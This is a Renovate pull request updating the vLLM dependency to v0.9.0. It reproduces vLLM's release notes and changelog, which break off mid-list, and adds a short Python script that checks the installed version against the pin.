Migrate to REGEX Library to prevent catastrophic backtracking (#18454, #18750)

Features

CLI: deprecated=True (#17426)
Frontend: progress bar for adding requests (#17525), chat_template_kwargs in LLM.chat (#17356), /classify endpoint (#17032), truncation control for embedding models (#14776), cached_tokens in response usage (#18149)
LoRA: default local directory LoRA resolver plugin. (#16855)
Metrics: kv event publishing (#16750), API for accessing in-memory Prometheus metrics (#17010)
Quantization: nvidia/DeepSeek-R1-FP4 (#16362), Quark MXFP4 format (#16943), AutoRound (#17850), torchao models with AOPerModuleConfig (#17826), CUDA Graph support for V1 GGUF support (#18646)
Reasoning: deprecate --enable-reasoning (#17452)
Spec Decode: EAGLE share input embedding (#17326), torch.compile & cudagraph to EAGLE (#17211), EAGLE3 (#17504), log accumulated metrics (#17913), Medusa (#17956)
Structured Outputs: Thinking compatibility (#16577), Spec Decoding (#14702), Qwen3 reasoning parser (#17466), tool_choice: required for Xgrammar (#17845), Structural Tag with Guidance backend (#17333)
Transformers backend: named parameters (#16868), interleaved sliding window attention (#18494)

Hardwares

NVIDIA: cutlass support for blackwell fp8 blockwise gemm (#14383)
TPU: Multi-LoRA implementation (#14238), default max-num-batched-tokens (#17508), V1 backend by default (#17673), top-logprobs (#17072)
Neuron: NeuronxDistributedInference support (#15970), Speculative Decoding, Dynamic on-device sampling (#16357), Mistral Model (#18222), Multi-LoRA (#18284)
AMD: Enable FP8 KV cache on V1 (#17870), Tuned fused moe config for Qwen3 MoE on MI300X (#17535, #17530), AITER biased group topk (#17955), Block-Scaled GEMM (#14968), MLA (#17523), Radeon GPU use Custom Paged Attention (#17004), reduce the number of environment variables in command line (#17229)
Extensibility: Make PiecewiseBackend pluggable and extendable (#18076)

Documentation

Update quickstart and install for cu128 using --torch-backend=auto (#18505)
NVIDIA TensorRT Model Optimizer (#17561)
Usage of Qwen3 thinking (#18291)

Developer Facing

Benchmark: Add single turn MTBench to Serving Bench (#17202)
Usability: Decrease import time of vllm.multimodal (#18031)
Code Format: Code formatting using ruff format (#17656, #18068, #18400)
Readability:
- Configuration and arguments unification is now complete! (#17130, #17453, #17562)
- Update deprecated type hinting from Python 3.7 (#18056, #18130, #18132, #18129, #18073, #18072, #18126, #18128, #18057, #18058)
Process:
- Propose a deprecation policy for the project (#17063)
Testing: expanding torch nightly tests (#18004)

What's Changed

Support loading transformers models with named parameters by @wuisawesome in https://github.com/vllm-project/vllm/pull/16868
Add tuned triton fused_moe configs for Qwen3Moe by @mgoin in https://github.com/vllm-project/vllm/pull/17328
[Benchmark] Add single turn MTBench to Serving Bench by @ekagra-ranjan in https://github.com/vllm-project/vllm/pull/17202
[Optim] Compute multimodal hash only once per item by @DarkLight1337 in https://github.com/vllm-project/vllm/pull/17314
implement Structural Tag with Guidance backend by @mmoskal in https://github.com/vllm-project/vllm/pull/17333
[V1][Spec Decode] Make Eagle model arch config driven by @ekagra-ranjan in https://github.com/vllm-project/vllm/pull/17323
[model] make llama4 compatible with pure dense layers by @luccafong in https://github.com/vllm-project/vllm/pull/17315
[Bugfix] Fix numel() downcast in fused_layernorm_dynamic_per_token_quant.cu by @r-barnes in https://github.com/vllm-project/vllm/pull/17316
Ignore '<string>' filepath by @zou3519 in https://github.com/vllm-project/vllm/pull/17330
[Bugfix] Add contiguous call inside rope kernel wrapper by @timzsu in https://github.com/vllm-project/vllm/pull/17091
[Misc] Add a Jinja template to support Mistral3 function calling by @chaunceyjiang in https://github.com/vllm-project/vllm/pull/17195
[Model] support MiniMax-VL-01 model by @qscqesze in https://github.com/vllm-project/vllm/pull/16328
[Misc] Move config fields to MultiModalConfig by @DarkLight1337 in https://github.com/vllm-project/vllm/pull/17343
[Misc]Use a platform independent interface to obtain the device attributes by @ponix-j in https://github.com/vllm-project/vllm/pull/17100
[Fix] Documentation spacing in compilation config help text by @Zerohertz in https://github.com/vllm-project/vllm/pull/17342
[Build][Bugfix] Restrict setuptools version to <80 by @gshtras in https://github.com/vllm-project/vllm/pull/17320
[Model] Ignore rotary embed load for Cohere model by @ekagra-ranjan in https://github.com/vllm-project/vllm/pull/17319
Update docs requirements by @hmellor in https://github.com/vllm-project/vllm/pull/17379
[Doc] Fix QWen3MOE info by @jeejeelee in https://github.com/vllm-project/vllm/pull/17381
[Bugfix] Clean up MiniMax-VL and fix processing by @DarkLight1337 in https://github.com/vllm-project/vllm/pull/17354
pre-commit autoupdate by @hmellor in https://github.com/vllm-project/vllm/pull/17380
[Frontend] Support chat_template_kwargs in LLM.chat by @DarkLight1337 in https://github.com/vllm-project/vllm/pull/17356
Transformers backend tweaks by @hmellor in https://github.com/vllm-project/vllm/pull/17365
Fix: Spelling of inference by @a2q1p in https://github.com/vllm-project/vllm/pull/17387
Improve literal dataclass field conversion to argparse argument by @hmellor in https://github.com/vllm-project/vllm/pull/17391
[V1] Remove num_input_tokens from attn_metadata by @heheda12345 in https://github.com/vllm-project/vllm/pull/17193
[Bugfix] add qwen3 reasoning-parser fix content is None when disable … by @mofanke in https://github.com/vllm-project/vllm/pull/17369
fix gemma3 results all zero by @mayuyuace in https://github.com/vllm-project/vllm/pull/17364
[Misc][ROCm] Exclude cutlass_mla_decode for ROCm build by @tywuAMD in https://github.com/vllm-project/vllm/pull/17289
Enabling multi-group kernel tests. by @Alexei-V-Ivanov-AMD in https://github.com/vllm-project/vllm/pull/17115
[Docs] Propose a deprecation policy for the project by @russellb in https://github.com/vllm-project/vllm/pull/17063
[Doc][Typo] Fixing label in new model requests link in overview.md by @casinca in https://github.com/vllm-project/vllm/pull/17400
[TPU][V1][CI] Replace python3 setup.py develop with standard pip install --e on TPU by @NickLucche in https://github.com/vllm-project/vllm/pull/17374
[CI] Uses Python 3.11 for TPU by @aarnphm in https://github.com/vllm-project/vllm/pull/17359
[CI/Build] Add retry mechanism for add-apt-repository by @reidliu41 in https://github.com/vllm-project/vllm/pull/17107
[Bugfix] Fix Minicpm-O-int4 GPTQ model inference by @Isotr0py in https://github.com/vllm-project/vllm/pull/17397
Simplify (and fix) passing of guided decoding backend options by @hmellor in https://github.com/vllm-project/vllm/pull/17008
Remove Falcon3 2x7B from CI by @hmellor in https://github.com/vllm-project/vllm/pull/17404
Fix: Python package installation for opentelmetry by @dilipgb in https://github.com/vllm-project/vllm/pull/17049
[V1][Spec Decode] Apply torch.compile & cudagraph to EAGLE by @luyuzhe111 in https://github.com/vllm-project/vllm/pull/17211
Remove Bamba 9B from CI by @hmellor in https://github.com/vllm-project/vllm/pull/17407
[V1][Feature] Enable Speculative Decoding with Structured Outputs by @benchislett in https://github.com/vllm-project/vllm/pull/14702
[release] Always git fetch all to get latest tag on TPU release by @khluu in https://github.com/vllm-project/vllm/pull/17322
Truncation control for embedding models by @gmarinho2 in https://github.com/vllm-project/vllm/pull/14776
Update PyTorch to 2.7.0 by @huydhn in https://github.com/vllm-project/vllm/pull/16859
Improve configs - ModelConfig by @hmellor in https://github.com/vllm-project/vllm/pull/17130
Fix call to logger.info_once by @hmellor in https://github.com/vllm-project/vllm/pull/17416
Fix some speculative decode tests with tl.dot by @huydhn in https://github.com/vllm-project/vllm/pull/17371
Support LoRA for Mistral3 by @mgoin in https://github.com/vllm-project/vllm/pull/17428
[Intel GPU] [CI]Fix XPU ci, setuptools >=80.0 have build issue by @jikunshang in https://github.com/vllm-project/vllm/pull/17298
[Hardware][Intel GPU] Upgrade to torch 2.7 by @jikunshang in https://github.com/vllm-project/vllm/pull/17444
[Bugfix] Fix AttributeError: 'State' object has no attribute 'engine_client' by @chaunceyjiang in https://github.com/vllm-project/vllm/pull/17434
[MODEL ADDITION] Ovis2 Model Addition by @mlinmg in https://github.com/vllm-project/vllm/pull/15826
Make the _apply_rotary_emb compatible with dynamo by @houseroad in https://github.com/vllm-project/vllm/pull/17435
[Misc] Remove deprecated files by @chaunceyjiang in https://github.com/vllm-project/vllm/pull/17447
[V1][Bugfix]: vllm v1 version metric num_gpu_blocks is None by @lengrongfu in https://github.com/vllm-project/vllm/pull/15755
[TPU][V1][CI] Update regression test baseline for v6 CI by @NickLucche in https://github.com/vllm-project/vllm/pull/17064
[Core] Prevent side-channel attacks via cache salting by @dr75 in https://github.com/vllm-project/vllm/pull/17045
[V1][Metrics] add support for kv event publishing by @alec-flowers in https://github.com/vllm-project/vllm/pull/16750
[Feature] The Qwen3 reasoning parser supports guided decoding by @chaunceyjiang in https://github.com/vllm-project/vllm/pull/17466
[Docs] Add command for running mypy tests from CI by @russellb in https://github.com/vllm-project/vllm/pull/17475
[Fix] Support passing args to logger by @aarnphm in https://github.com/vllm-project/vllm/pull/17425
[Bugfix] Fixed mistral tokenizer path when pointing to file by @psav in https://github.com/vllm-project/vllm/pull/17457
[V1] Allow turning off pickle fallback in vllm.v1.serial_utils by @russellb in https://github.com/vllm-project/vllm/pull/17427
[Docs] Update optimization.md doc by @mgoin in https://github.com/vllm-project/vllm/pull/17482
[BugFix] Fix authorization of openai_transcription_client.py by @hhy3 in https://github.com/vllm-project/vllm/pull/17321
[Bugfix][ROCm] Restrict ray version due to a breaking release by @gshtras in https://github.com/vllm-project/vllm/pull/17480
[doc] add install tips by @reidliu41 in https://github.com/vllm-project/vllm/pull/17373
doc: fix bug report Github template formatting by @davidxia in https://github.com/vllm-project/vllm/pull/17486
[v1][Spec Decode] Make sliding window compatible with eagle prefix caching by @heheda12345 in https://github.com/vllm-project/vllm/pull/17398
Bump Compressed Tensors version to 0.9.4 by @rahul-tuli in https://github.com/vllm-project/vllm/pull/17478
[Misc] Rename Audios -> Audio in Qwen2audio Processing by @alex-jw-brooks in https://github.com/vllm-project/vllm/pull/17507
[CI][TPU] Skip Multimodal test by @lsy323 in https://github.com/vllm-project/vllm/pull/17488
[Bugfix][ROCm] Fix import error on ROCm by @gshtras in https://github.com/vllm-project/vllm/pull/17495
[Bugfix] Temporarily disable gptq_bitblas on ROCm by @nlzy in https://github.com/vllm-project/vllm/pull/17411
[CI][TPU] Skip structured outputs+spec decode tests on TPU by @mgoin in https://github.com/vllm-project/vllm/pull/17510
[CI][Bugfix] Fix failing V1 Test due to missing 'cache_salt' arg by @mgoin in https://github.com/vllm-project/vllm/pull/17500
[CI/Build] Reorganize models tests by @DarkLight1337 in https://github.com/vllm-project/vllm/pull/17459
Fixing the AMD test failures caused by PR #16457 by @Alexei-V-Ivanov-AMD in https://github.com/vllm-project/vllm/pull/17511
[Build] Require setuptools >= 77.0.3 for PEP 639 by @russellb in https://github.com/vllm-project/vllm/pull/17389
[ROCm] Effort to reduce the number of environment variables in command line by @hongxiayang in https://github.com/vllm-project/vllm/pull/17229
[BugFix] fix speculative decoding memory leak when speculation is disabled by @noyoshi in https://github.com/vllm-project/vllm/pull/15506
[BugFix] Fix mla cpu - missing 3 required positional arguments by @LucasWilkinson in https://github.com/vllm-project/vllm/pull/17494
Avoid overwriting vllm_compile_cache.py by @youngkent in https://github.com/vllm-project/vllm/pull/17418
[Core] Enable IPv6 with vllm.utils.make_zmq_socket() by @russellb in https://github.com/vllm-project/vllm/pull/16506
[Misc] Optimize the Qwen3_ReasoningParser extract_reasoning_content by @chaunceyjiang in https://github.com/vllm-project/vllm/pull/17515
Improve configs - ObservabilityConfig by @hmellor in https://github.com/vllm-project/vllm/pull/17453
[Bugfix][Benchmarks] Allow benchmark of deepspeed-mii backend to select a model by @tishizaki in https://github.com/vllm-project/vllm/pull/17285
[Frontend] Show progress bar for adding requests by @DarkLight1337 in https://github.com/vllm-project/vllm/pull/17525
[Misc] Clean up test docstrings and names by [@DarkLight1337](https://r

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.
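
Since automerge is disabled and the merge is manual, it may help to confirm that an environment actually resolves to the pinned release before signing off. The following is a minimal sketch, not part of Renovate or vLLM: the helper names (`release_tuple`, `meets_minimum`, `installed_vllm_ok`) are hypothetical, and the parser only looks at the leading numeric part of the version string, so it treats a pre-release such as `0.9.0rc1` the same as `0.9.0`.

```python
import re
from importlib import metadata

# Assumption: 0.9.0 is the minimum acceptable version, taken from this PR's pin.
MINIMUM = (0, 9, 0)


def release_tuple(version: str) -> tuple[int, ...]:
    """Return the leading numeric release segment, padded to three parts."""
    match = re.match(r"\d+(?:\.\d+)*", version)
    if match is None:
        raise ValueError(f"unrecognised version string: {version!r}")
    parts = tuple(int(part) for part in match.group().split("."))
    # Pad short versions such as "0.9" so tuple comparison behaves as expected.
    return parts + (0,) * max(0, 3 - len(parts))


def meets_minimum(version: str, minimum: tuple[int, ...] = MINIMUM) -> bool:
    """True if the numeric release segment is at least `minimum`."""
    return release_tuple(version) >= minimum


def installed_vllm_ok() -> bool:
    """Check the vllm distribution installed in the current environment, if any."""
    try:
        return meets_minimum(metadata.version("vllm"))
    except metadata.PackageNotFoundError:
        return False


if __name__ == "__main__":
    print("vllm meets the 0.9.0 pin:", installed_vllm_ok())
```

Running the script inside the target environment prints whether the installed `vllm` distribution is at or above the pin. A missing installation is reported as not meeting it.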

Update dependency vllm to v0.9.0 [SECURITY]

dfe9935

renovate bot mentioned this pull request Jun 17, 2025

Update dependency openai to v1.99.6 #6

Open

1 task
